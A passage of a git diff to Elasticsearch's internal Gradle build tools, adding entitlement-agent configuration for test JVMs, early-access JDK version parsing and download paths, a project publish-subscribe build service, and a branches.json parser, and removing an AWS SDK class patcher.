entitlements can be properly enforced + nonInputProperties.systemProperty("tempDir", test.getWorkingDir().toPath().resolve("nodesTemp")); + } + + SourceSetContainer sourceSets = project.getExtensions().getByType(SourceSetContainer.class); + SourceSet mainSourceSet = sourceSets.findByName(SourceSet.MAIN_SOURCE_SET_NAME); + SourceSet testSourceSet = sourceSets.findByName(SourceSet.TEST_SOURCE_SET_NAME); + SourceSet internalClusterTestSourceSet = sourceSets.findByName("internalClusterTest"); + + if (TEST_TASKS_WITH_ENTITLEMENTS.contains(test.getName()) && mainSourceSet != null && testSourceSet != null) { + FileCollection mainRuntime = mainSourceSet.getRuntimeClasspath(); + FileCollection testRuntime = testSourceSet.getRuntimeClasspath(); + FileCollection internalClusterTestRuntime = ("internalClusterTest".equals(test.getName()) + && internalClusterTestSourceSet != null) ? internalClusterTestSourceSet.getRuntimeClasspath() : project.files(); + FileCollection testOnlyFiles = testRuntime.plus(internalClusterTestRuntime).minus(mainRuntime); + + test.doFirst(task -> test.environment("es.entitlement.testOnlyPath", testOnlyFiles.getAsPath())); + } test.systemProperties(getProviderFactory().systemPropertiesPrefixedBy("tests.").get()); test.systemProperties(getProviderFactory().systemPropertiesPrefixedBy("es.").get()); @@ -205,46 +229,124 @@ public void execute(Task t) { } /* - * If this project builds a shadow JAR than any unit tests should test against that artifact instead of + * If this project builds a shadow JAR then any unit tests should test against that artifact instead of * compiled class output and dependency jars. This better emulates the runtime environment of consumers. */ project.getPluginManager().withPlugin("com.gradleup.shadow", p -> { if (test.getName().equals(JavaPlugin.TEST_TASK_NAME)) { // Remove output class files and any other dependencies from the test classpath, since the shadow JAR includes these - SourceSetContainer sourceSets = project.getExtensions().getByType(SourceSetContainer.class); - FileCollection mainRuntime = sourceSets.getByName(SourceSet.MAIN_SOURCE_SET_NAME).getRuntimeClasspath(); // Add any "shadow" dependencies. These are dependencies that are *not* bundled into the shadow JAR Configuration shadowConfig = project.getConfigurations().getByName(ShadowBasePlugin.CONFIGURATION_NAME); // Add the shadow JAR artifact itself FileCollection shadowJar = project.files(project.getTasks().named("shadowJar")); - FileCollection testRuntime = sourceSets.getByName(SourceSet.TEST_SOURCE_SET_NAME).getRuntimeClasspath(); + FileCollection mainRuntime = mainSourceSet.getRuntimeClasspath(); + FileCollection testRuntime = testSourceSet.getRuntimeClasspath(); test.setClasspath(testRuntime.minus(mainRuntime).plus(shadowConfig).plus(shadowJar)); } }); }); - configureImmutableCollectionsPatch(project); + configureJavaBaseModuleOptions(project); + configureEntitlements(project); + } + + /** + * Computes and sets the {@code --patch-module=java.base} and {@code --add-opens=java.base} JVM command line options. + */ + private void configureJavaBaseModuleOptions(Project project) { + project.getTasks().withType(Test.class).configureEach(test -> { + // patch immutable collections only for "test" task + FileCollection patchedImmutableCollections = test.getName().equals("test") ? 
patchedImmutableCollections(project) : null; + if (patchedImmutableCollections != null) { + test.getInputs().files(patchedImmutableCollections); + test.systemProperty("tests.hackImmutableCollections", "true"); + } + + FileCollection entitlementBridge = TEST_TASKS_WITH_ENTITLEMENTS.contains(test.getName()) ? entitlementBridge(project) : null; + if (entitlementBridge != null) { + test.getInputs().files(entitlementBridge); + } + + test.getJvmArgumentProviders().add(() -> { + String javaBasePatch = Stream.concat( + singleFilePath(patchedImmutableCollections).map(str -> str + "/java.base"), + singleFilePath(entitlementBridge) + ).collect(joining(File.pathSeparator)); + + return javaBasePatch.isEmpty() + ? List.of() + : List.of("--patch-module=java.base=" + javaBasePatch, "--add-opens=java.base/java.util=ALL-UNNAMED"); + }); + }); + } + + private Stream singleFilePath(FileCollection collection) { + return Stream.ofNullable(collection).filter(fc -> fc.isEmpty() == false).map(FileCollection::getSingleFile).map(File::toString); } - private void configureImmutableCollectionsPatch(Project project) { + private static FileCollection patchedImmutableCollections(Project project) { String patchProject = ":test:immutable-collections-patch"; if (project.findProject(patchProject) == null) { - return; // build tests may not have this project, just skip + return null; // build tests may not have this project, just skip } String configurationName = "immutableCollectionsPatch"; FileCollection patchedFileCollection = project.getConfigurations() .create(configurationName, config -> config.setCanBeConsumed(false)); var deps = project.getDependencies(); deps.add(configurationName, deps.project(Map.of("path", patchProject, "configuration", "patch"))); - project.getTasks().withType(Test.class).matching(task -> task.getName().equals("test")).configureEach(test -> { - test.getInputs().files(patchedFileCollection); - test.systemProperty("tests.hackImmutableCollections", "true"); - test.getJvmArgumentProviders() - .add( - () -> List.of( - "--patch-module=java.base=" + patchedFileCollection.getSingleFile() + "/java.base", - "--add-opens=java.base/java.util=ALL-UNNAMED" - ) + return patchedFileCollection; + } + + private static FileCollection entitlementBridge(Project project) { + return project.getConfigurations().findByName("entitlementBridge"); + } + + /** + * Sets the required JVM options and system properties to enable entitlement enforcement on tests. + *
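+ * For instance, the resulting test JVM invocation ends up looking roughly like this (paths shortened,
+ * purely illustrative):
+ * <pre>
+ *     java --patch-module=java.base=.../immutable-collections-patch/java.base:.../entitlement-bridge.jar
+ *          --add-opens=java.base/java.util=ALL-UNNAMED
+ *          --add-exports=java.base/org.elasticsearch.entitlement.bridge=ALL-UNNAMED,java.logging,java.net.http,java.naming,jdk.net
+ *          -Des.entitlement.agentJar=.../entitlement-agent.jar -Djdk.attach.allowAttachSelf=true ...
+ * </pre>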

+ * One command line option is set in {@link #configureJavaBaseModuleOptions} out of necessity, + * since the command line can have only one {@code --patch-module} option for a given module. + */ + private static void configureEntitlements(Project project) { + Configuration agentConfig = project.getConfigurations().create("entitlementAgent"); + Project agent = project.findProject(":libs:entitlement:agent"); + if (agent != null) { + agentConfig.defaultDependencies( + deps -> { deps.add(project.getDependencies().project(Map.of("path", ":libs:entitlement:agent"))); } + ); + } + FileCollection agentFiles = agentConfig; + + Configuration bridgeConfig = project.getConfigurations().create("entitlementBridge"); + Project bridge = project.findProject(":libs:entitlement:bridge"); + if (bridge != null) { + bridgeConfig.defaultDependencies( + deps -> { deps.add(project.getDependencies().project(Map.of("path", ":libs:entitlement:bridge"))); } + ); + } + FileCollection bridgeFiles = bridgeConfig; + + project.getTasks() + .withType(Test.class) + .matching(test -> TEST_TASKS_WITH_ENTITLEMENTS.contains(test.getName())) + .configureEach(test -> { + // See also SystemJvmOptions.maybeAttachEntitlementAgent. + SystemPropertyCommandLineArgumentProvider nonInputSystemProperties = test.getExtensions() + .getByType(SystemPropertyCommandLineArgumentProvider.class); + + // Agent + test.getInputs().files(agentFiles).optional(true); + nonInputSystemProperties.systemProperty("es.entitlement.agentJar", agentFiles::getAsPath); + nonInputSystemProperties.systemProperty("jdk.attach.allowAttachSelf", () -> agentFiles.isEmpty() ? "false" : "true"); + + // Bridge + String modulesContainingEntitlementInstrumentation = "java.logging,java.net.http,java.naming,jdk.net"; + test.getInputs().files(bridgeFiles).optional(true); + // Tests may not be modular, but the JDK still is + test.jvmArgs( + "--add-exports=java.base/org.elasticsearch.entitlement.bridge=ALL-UNNAMED," + + modulesContainingEntitlementInstrumentation ); - }); + }); } + } diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPlugin.java index c2547b72e21fa..7dc6afb28159d 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalDistributionArchiveSetupPlugin.java @@ -74,6 +74,7 @@ private void registerAndConfigureDistributionArchivesExtension(Project project) project.project(subProjectName, sub -> { sub.getPlugins().apply(BasePlugin.class); sub.getArtifacts().add(DEFAULT_CONFIGURATION_NAME, distributionArchive.getArchiveTask()); + sub.getTasks().named("assemble").configure(task -> task.dependsOn(distributionArchive.getArchiveTask())); var extractedConfiguration = sub.getConfigurations().create(EXTRACTED_CONFIGURATION_NAME); extractedConfiguration.setCanBeResolved(false); extractedConfiguration.setCanBeConsumed(true); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalTestClustersPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalTestClustersPlugin.java index f1b96016286df..2a2e1ea28d1ec 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalTestClustersPlugin.java +++ 
b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/InternalTestClustersPlugin.java @@ -34,12 +34,13 @@ public void apply(Project project) { || buildParams.getBwcVersions().unreleasedInfo(version) == null ); - if (shouldConfigureTestClustersWithOneProcessor()) { - NamedDomainObjectContainer<ElasticsearchCluster> testClusters = (NamedDomainObjectContainer<ElasticsearchCluster>) project - .getExtensions() - .getByName(TestClustersPlugin.EXTENSION_NAME); - testClusters.configureEach(elasticsearchCluster -> elasticsearchCluster.setting("node.processors", "1")); - } + NamedDomainObjectContainer<ElasticsearchCluster> testClusters = (NamedDomainObjectContainer<ElasticsearchCluster>) project + .getExtensions() + .getByName(TestClustersPlugin.EXTENSION_NAME); + // Limit the number of allocated processors for all nodes to 2 in the cluster by default. + // This is to ensure that the tests run consistently across different environments. + String processorCount = shouldConfigureTestClustersWithOneProcessor() ? "1" : "2"; + testClusters.configureEach(elasticsearchCluster -> elasticsearchCluster.setting("node.processors", processorCount)); } private boolean shouldConfigureTestClustersWithOneProcessor() { diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/Jdk.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/Jdk.java index 4396a18c205c1..dfbfe0f16768c 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/Jdk.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/Jdk.java @@ -32,6 +32,7 @@ public class Jdk implements Buildable, Iterable<File> { "(\\d+)(\\.\\d+\\.\\d+(?:\\.\\d+)?)?\\+(\\d+(?:\\.\\d+)?)(@([a-f0-9]{32}))?" ); private static final Pattern LEGACY_VERSION_PATTERN = Pattern.compile("(\\d)(u\\d+)\\+(b\\d+?)(@([a-f0-9]{32}))?"); + private static final Pattern EA_VERSION_PATTERN = Pattern.compile("(\\d+)-(?:ea|rc)\\+(\\d+)(@([a-f0-9]{32}))?"); private final String name; private final FileCollection configuration; @@ -78,7 +79,9 @@ public String getVersion() { } public void setVersion(String version) { - if (VERSION_PATTERN.matcher(version).matches() == false && LEGACY_VERSION_PATTERN.matcher(version).matches() == false) { + if (VERSION_PATTERN.matcher(version).matches() == false + && LEGACY_VERSION_PATTERN.matcher(version).matches() == false + && EA_VERSION_PATTERN.matcher(version).matches() == false) { throw new IllegalArgumentException("malformed version [" + version + "] for jdk [" + name + "]"); } parseVersion(version); @@ -112,7 +115,7 @@ public void setArchitecture(final String architecture) { } public String getDistributionVersion() { - return distributionVersion.get(); + return distributionVersion.getOrNull(); } public void setDistributionVersion(String distributionVersion) { @@ -218,9 +221,17 @@ private void parseVersion(String version) { if (jdkVersionMatcher.matches() == false) { // Try again with the pre-Java9 version format jdkVersionMatcher = LEGACY_VERSION_PATTERN.matcher(version); if (jdkVersionMatcher.matches() == false) { - throw new IllegalArgumentException("Malformed jdk version [" + version + "]"); + // Try again with the early-access (ea/rc) version format + jdkVersionMatcher = EA_VERSION_PATTERN.matcher(version); + if (jdkVersionMatcher.matches() == false) { + throw new IllegalArgumentException("Malformed jdk version [" + version + "]"); + } + baseVersion = version; + major = jdkVersionMatcher.group(1); + build = jdkVersionMatcher.group(2); + hash = null; + return; } } diff --git 
a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/JdkDownloadPlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/JdkDownloadPlugin.java index 3c278128e43f2..e3fb732696d9d 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/JdkDownloadPlugin.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/JdkDownloadPlugin.java @@ -115,23 +115,39 @@ private void setupRepository(Project project, Jdk jdk) { + "/[module]/[classifier]/jdk/hotspot/normal/adoptium"; } } else if (jdk.getVendor().equals(VENDOR_OPENJDK)) { - repoUrl = "https://download.oracle.com"; - if (jdk.getHash() != null) { + if ("ea".equals(jdk.getDistributionVersion())) { + repoUrl = "https://builds.es-jdk-archive.com/"; // current pattern since 12.0.1 - artifactPattern = "java/GA/jdk" - + jdk.getBaseVersion() - + "/" - + jdk.getHash() - + "/" - + jdk.getBuild() - + "/GPL/openjdk-[revision]_[module]-[classifier]_bin.[ext]"; - } else { - // simpler legacy pattern from JDK 9 to JDK 12 that we are advocating to Oracle to bring back - artifactPattern = "java/GA/jdk" + artifactPattern = "jdks/openjdk/" + jdk.getMajor() - + "/" - + jdk.getBuild() - + "/GPL/openjdk-[revision]_[module]-[classifier]_bin.[ext]"; + + "/openjdk-[revision]/openjdk-[revision]_[module]-[classifier]_bin.[ext]"; + } else if ("rc".equals(jdk.getDistributionVersion())) { + repoUrl = "https://builds.es-jdk-archive.com/"; + // current pattern since 12.0.1 + artifactPattern = "jdks/openjdk/" + + jdk.getMajor() + + "/openjdk-[revision]/openjdk-" + + jdk.getMajor() + + "_[module]-[classifier]_bin.[ext]"; + } else { + repoUrl = "https://download.oracle.com"; + if (jdk.getHash() != null) { + // current pattern since 12.0.1 + artifactPattern = "java/GA/jdk" + + jdk.getBaseVersion() + + "/" + + jdk.getHash() + + "/" + + jdk.getBuild() + + "/GPL/openjdk-[revision]_[module]-[classifier]_bin.[ext]"; + } else { + // simpler legacy pattern from JDK 9 to JDK 12 that we are advocating to Oracle to bring back + artifactPattern = "java/GA/jdk" + + jdk.getMajor() + + "/" + + jdk.getBuild() + + "/GPL/openjdk-[revision]_[module]-[classifier]_bin.[ext]"; + } } } else if (jdk.getVendor().equals(VENDOR_ZULU)) { repoUrl = "https://cdn.azul.com"; diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ProjectSubscribeBuildService.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ProjectSubscribeBuildService.java new file mode 100644 index 0000000000000..d9daf8e9d91b0 --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ProjectSubscribeBuildService.java @@ -0,0 +1,51 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */ + +package org.elasticsearch.gradle.internal; + +import org.gradle.api.Project; +import org.gradle.api.provider.Provider; +import org.gradle.api.provider.ProviderFactory; +import org.gradle.api.services.BuildService; +import org.gradle.api.services.BuildServiceParameters; + +import java.util.Collection; +import java.util.HashMap; +import java.util.Map; + +import javax.inject.Inject; + +public abstract class ProjectSubscribeBuildService implements BuildService<BuildServiceParameters.None> { + + private final ProviderFactory providerFactory; + + /** + * The content of this map depends on the order in which #registerProjectForTopic is called. + * This is usually done during the configuration phase, but we do not yet enforce when this method may be called. + * The values are LinkedHashSets to preserve the order of registration, mostly to provide a predictable order + * when running consecutive builds. + * */ + private final Map<String, Collection<String>> versionsByTopic = new HashMap<>(); + + @Inject + public ProjectSubscribeBuildService(ProviderFactory providerFactory) { + this.providerFactory = providerFactory; + } + + /** + * Returns a provider so that the evaluation of the map value is deferred until the provider is queried. + * */ + public Provider<Collection<String>> getProjectsByTopic(String topic) { + return providerFactory.provider(() -> versionsByTopic.computeIfAbsent(topic, k -> new java.util.LinkedHashSet<>())); + } + + public void registerProjectForTopic(String topic, Project project) { + versionsByTopic.computeIfAbsent(topic, k -> new java.util.LinkedHashSet<>()).add(project.getPath()); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ProjectSubscribeServicePlugin.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ProjectSubscribeServicePlugin.java new file mode 100644 index 0000000000000..32ed1cf875ddf --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/ProjectSubscribeServicePlugin.java @@ -0,0 +1,44 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal; + +import org.gradle.api.Plugin; +import org.gradle.api.Project; +import org.gradle.api.provider.Provider; + +/** + * This plugin registers a {@link ProjectSubscribeBuildService} to allow projects to + * communicate with each other during the configuration phase. + * + * For example, a project can register itself as a publisher of a topic, and other + * projects can resolve projects that have registered as publishers of that topic. + * + * The actual resolution of the data itself is usually done via dependency declarations. + * Be aware that the state of the list depends on the order of project configuration; + * consuming it during the configuration phase, before task graph calculation, should be avoided. 
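+ *
+ * A minimal usage sketch (illustrative only; the topic name "restTests" is made up):
+ * <pre>{@code
+ *     Provider<ProjectSubscribeBuildService> service =
+ *         project.getPlugins().apply(ProjectSubscribeServicePlugin.class).getService();
+ *     // publisher side: register this project under a topic
+ *     service.get().registerProjectForTopic("restTests", project);
+ *     // consumer side: the Provider defers the lookup until it is queried
+ *     Provider<Collection<String>> projectPaths = service.get().getProjectsByTopic("restTests");
+ * }</pre>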
+ * + * We want to avoid discouraged plugin API usage like project.allprojects or project.subprojects + * in plugins, both to avoid unnecessary configuration of projects and to not break project isolation. + * See https://docs.gradle.org/current/userguide/isolated_projects.html + * */ +public class ProjectSubscribeServicePlugin implements Plugin<Project> { + + private Provider<ProjectSubscribeBuildService> publishSubscribe; + + @Override + public void apply(Project project) { + publishSubscribe = project.getGradle().getSharedServices().registerIfAbsent("publishSubscribe", ProjectSubscribeBuildService.class); + } + + public Provider<ProjectSubscribeBuildService> getService() { + return publishSubscribe; + } + +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/RestrictedBuildApiService.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/RestrictedBuildApiService.java index 4f3c4b3d94f68..4e9f08bc48f38 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/RestrictedBuildApiService.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/RestrictedBuildApiService.java @@ -56,14 +56,6 @@ private static ListMultimap<Class<?>, String> createLegacyRestTestBasePluginUsag map.put(LegacyRestTestBasePlugin.class, ":x-pack:qa:third-party:jira"); map.put(LegacyRestTestBasePlugin.class, ":x-pack:qa:third-party:pagerduty"); map.put(LegacyRestTestBasePlugin.class, ":x-pack:qa:third-party:slack"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:async-search:qa:rest"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:autoscaling:qa:rest"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:deprecation:qa:early-deprecation-rest"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:deprecation:qa:rest"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:downsample:qa:with-security"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:enrich:qa:rest"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:enrich:qa:rest-with-advanced-security"); - map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:enrich:qa:rest-with-security"); map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:ent-search:qa:rest"); map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:eql:qa:ccs-rolling-upgrade"); map.put(LegacyRestTestBasePlugin.class, ":x-pack:plugin:eql:qa:correctness"); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTar.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTar.java index ec4b1fea9e962..b5a19dbdffd0a 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTar.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/SymbolicLinkPreservingTar.java @@ -41,7 +41,7 @@ * * This task is necessary because the built-in task {@link org.gradle.api.tasks.bundling.Tar} does not preserve symbolic links. 
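*
* A registration sketch (illustrative; the task name and source path are assumptions, not taken from this build):
* <pre>{@code
*     tasks.register("symlinkedDistTar", SymbolicLinkPreservingTar.class, tar -> {
*         tar.setCompression(Compression.GZIP);
*         tar.from("build/dist-content"); // symbolic links under this tree survive archiving
*     });
* }</pre>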
*/ -public class SymbolicLinkPreservingTar extends Tar { +public abstract class SymbolicLinkPreservingTar extends Tar { @Override protected CopyAction createCopyAction() { diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/dependencies/patches/awsv2sdk/Awsv2ClassPatcher.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/dependencies/patches/awsv2sdk/Awsv2ClassPatcher.java deleted file mode 100644 index 1e515afd8404b..0000000000000 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/dependencies/patches/awsv2sdk/Awsv2ClassPatcher.java +++ /dev/null @@ -1,61 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the "Elastic License - * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side - * Public License v 1"; you may not use this file except in compliance with, at - * your election, the "Elastic License 2.0", the "GNU Affero General Public - * License v3.0 only", or the "Server Side Public License, v 1". - */ - -package org.elasticsearch.gradle.internal.dependencies.patches.awsv2sdk; - -import org.elasticsearch.gradle.internal.dependencies.patches.PatcherInfo; -import org.elasticsearch.gradle.internal.dependencies.patches.Utils; -import org.gradle.api.artifacts.transform.CacheableTransform; -import org.gradle.api.artifacts.transform.InputArtifact; -import org.gradle.api.artifacts.transform.TransformAction; -import org.gradle.api.artifacts.transform.TransformOutputs; -import org.gradle.api.artifacts.transform.TransformParameters; -import org.gradle.api.file.FileSystemLocation; -import org.gradle.api.provider.Provider; -import org.gradle.api.tasks.Classpath; -import org.jetbrains.annotations.NotNull; - -import java.io.File; -import java.util.List; - -import static org.elasticsearch.gradle.internal.dependencies.patches.PatcherInfo.classPatcher; - -@CacheableTransform -public abstract class Awsv2ClassPatcher implements TransformAction { - - private static final String JAR_FILE_TO_PATCH = "aws-query-protocol"; - - private static final List CLASS_PATCHERS = List.of( - // This patcher is needed because of this AWS bug: https://github.com/aws/aws-sdk-java-v2/issues/5968 - // As soon as the bug is resolved and we upgrade our AWS SDK v2 libraries, we can remove this. 
- classPatcher( - "software/amazon/awssdk/protocols/query/internal/marshall/ListQueryMarshaller.class", - "213e84d9a745bdae4b844334d17aecdd6499b36df32aa73f82dc114b35043009", - StringFormatInPathResolverPatcher::new - ) - ); - - @Classpath - @InputArtifact - public abstract Provider getInputArtifact(); - - @Override - public void transform(@NotNull TransformOutputs outputs) { - File inputFile = getInputArtifact().get().getAsFile(); - - if (inputFile.getName().startsWith(JAR_FILE_TO_PATCH)) { - System.out.println("Patching " + inputFile.getName()); - File outputFile = outputs.file(inputFile.getName().replace(".jar", "-patched.jar")); - Utils.patchJar(inputFile, outputFile, CLASS_PATCHERS); - } else { - System.out.println("Skipping " + inputFile.getName()); - outputs.file(getInputArtifact()); - } - } -} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/dependencies/patches/awsv2sdk/StringFormatInPathResolverPatcher.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/dependencies/patches/awsv2sdk/StringFormatInPathResolverPatcher.java deleted file mode 100644 index 506dab001dbe7..0000000000000 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/dependencies/patches/awsv2sdk/StringFormatInPathResolverPatcher.java +++ /dev/null @@ -1,89 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the "Elastic License - * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side - * Public License v 1"; you may not use this file except in compliance with, at - * your election, the "Elastic License 2.0", the "GNU Affero General Public - * License v3.0 only", or the "Server Side Public License, v 1". 
- */ - -package org.elasticsearch.gradle.internal.dependencies.patches.awsv2sdk; - -import org.objectweb.asm.ClassVisitor; -import org.objectweb.asm.ClassWriter; -import org.objectweb.asm.MethodVisitor; -import org.objectweb.asm.Type; - -import java.util.Locale; - -import static org.objectweb.asm.Opcodes.ASM9; -import static org.objectweb.asm.Opcodes.GETSTATIC; -import static org.objectweb.asm.Opcodes.INVOKESTATIC; - -class StringFormatInPathResolverPatcher extends ClassVisitor { - - StringFormatInPathResolverPatcher(ClassWriter classWriter) { - super(ASM9, classWriter); - } - - @Override - public MethodVisitor visitMethod(int access, String name, String descriptor, String signature, String[] exceptions) { - return new ReplaceCallMethodVisitor(super.visitMethod(access, name, descriptor, signature, exceptions)); - } - - /** - * Replaces calls to String.format(format, args); with calls to String.format(Locale.ROOT, format, args); - */ - private static class ReplaceCallMethodVisitor extends MethodVisitor { - private static final String CLASS_INTERNAL_NAME = Type.getInternalName(String.class); - private static final String METHOD_NAME = "format"; - private static final String OLD_METHOD_DESCRIPTOR = Type.getMethodDescriptor( - Type.getType(String.class), - Type.getType(String.class), - Type.getType(Object[].class) - ); - private static final String NEW_METHOD_DESCRIPTOR = Type.getMethodDescriptor( - Type.getType(String.class), - Type.getType(Locale.class), - Type.getType(String.class), - Type.getType(Object[].class) - ); - - private boolean foundFormatPattern = false; - - ReplaceCallMethodVisitor(MethodVisitor methodVisitor) { - super(ASM9, methodVisitor); - } - - @Override - public void visitLdcInsn(Object value) { - if (value instanceof String s && s.startsWith("%s")) { - if (foundFormatPattern) { - throw new IllegalStateException( - "A previous string format constant was not paired with a String.format() call. 
" - + "Patching would generate an unbalances stack" - ); - } - // Push the extra arg on the stack - mv.visitFieldInsn(GETSTATIC, Type.getInternalName(Locale.class), "ROOT", Type.getDescriptor(Locale.class)); - foundFormatPattern = true; - } - super.visitLdcInsn(value); - } - - @Override - public void visitMethodInsn(int opcode, String owner, String name, String descriptor, boolean isInterface) { - if (opcode == INVOKESTATIC - && foundFormatPattern - && CLASS_INTERNAL_NAME.equals(owner) - && METHOD_NAME.equals(name) - && OLD_METHOD_DESCRIPTOR.equals(descriptor)) { - // Replace the call with String.format(Locale.ROOT, format, args) - mv.visitMethodInsn(INVOKESTATIC, CLASS_INTERNAL_NAME, METHOD_NAME, NEW_METHOD_DESCRIPTOR, false); - foundFormatPattern = false; - } else { - super.visitMethodInsn(opcode, owner, name, descriptor, isInterface); - } - } - } -} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/idea/IdeaXmlUtil.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/idea/IdeaXmlUtil.java index b7cc2862a0af1..7fbc9c341603b 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/idea/IdeaXmlUtil.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/idea/IdeaXmlUtil.java @@ -10,8 +10,8 @@ package org.elasticsearch.gradle.internal.idea; import groovy.util.Node; -import groovy.util.XmlParser; import groovy.xml.XmlNodePrinter; +import groovy.xml.XmlParser; import org.gradle.api.Action; import org.xml.sax.SAXException; diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BranchesFileParser.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BranchesFileParser.java new file mode 100644 index 0000000000000..1c502a633e1ec --- /dev/null +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BranchesFileParser.java @@ -0,0 +1,46 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */ + +package org.elasticsearch.gradle.internal.info; + +import com.fasterxml.jackson.databind.JsonNode; +import com.fasterxml.jackson.databind.ObjectMapper; + +import org.elasticsearch.gradle.Version; + +import java.io.IOException; +import java.io.UncheckedIOException; +import java.util.ArrayList; +import java.util.List; + +/** + * A parser for the branches.json file + */ +public class BranchesFileParser { + + private final ObjectMapper objectMapper; + + public BranchesFileParser(ObjectMapper objectMapper) { + this.objectMapper = objectMapper; + } + + public List parse(byte[] bytes) { + List branches = new ArrayList<>(); + try { + JsonNode json = objectMapper.readTree(bytes); + for (JsonNode node : json.get("branches")) { + branches.add(new DevelopmentBranch(node.get("branch").asText(), Version.fromString(node.get("version").asText()))); + } + } catch (IOException e) { + throw new UncheckedIOException("Failed to parse content of branches.json", e); + } + + return branches; + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BuildParameterExtension.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BuildParameterExtension.java index d6c8e38dac2c3..c3c2a9cdfe672 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BuildParameterExtension.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/BuildParameterExtension.java @@ -32,6 +32,8 @@ public interface BuildParameterExtension { Boolean getIsRuntimeJavaHomeSet(); + RuntimeJava getRuntimeJava(); + List getJavaVersions(); JavaVersion getMinimumCompilerVersion(); diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DefaultBuildParameterExtension.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/info/DefaultBuildParameterExtension.java index 760664f9fa025..ccda893cc9500 100644 